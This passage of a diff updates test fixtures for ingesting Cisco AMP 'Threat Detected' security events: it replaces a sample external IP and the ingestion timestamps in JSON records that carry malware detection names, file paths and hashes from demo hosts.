Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196244\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1065,7 +1065,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1112,7 +1112,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1126,8 +1126,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174529896Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":178000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196243\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337113Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":178000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196243\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1149,7 +1149,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1196,7 +1196,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1210,8 +1210,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174536354Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":147000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196242\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337118800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":147000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196242\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1233,7 +1233,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1280,7 +1280,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1294,8 +1294,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174538921Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196241\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337124600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196241\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1317,7 +1317,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1364,7 +1364,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1378,8 +1378,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174541191Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196240\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337130600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196240\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1401,7 +1401,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1448,7 +1448,7 @@ "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1458,8 +1458,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174543224Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259080131183000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":996000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259080131182683\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "ingested": "2021-12-09T13:35:36.337136400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259080131183000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":996000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259080131182683\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1481,7 +1481,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1528,7 +1528,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1542,8 +1542,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174545241Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251507855229000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":944000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251507855228943\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337142200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251507855229000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":944000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251507855228943\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1565,7 +1565,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1612,7 +1612,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1626,8 +1626,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174547286Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251507855229000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":8000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337148100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251507855229000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":8000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1649,7 +1649,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1696,7 +1696,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1710,8 +1710,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174549297Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":821000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat 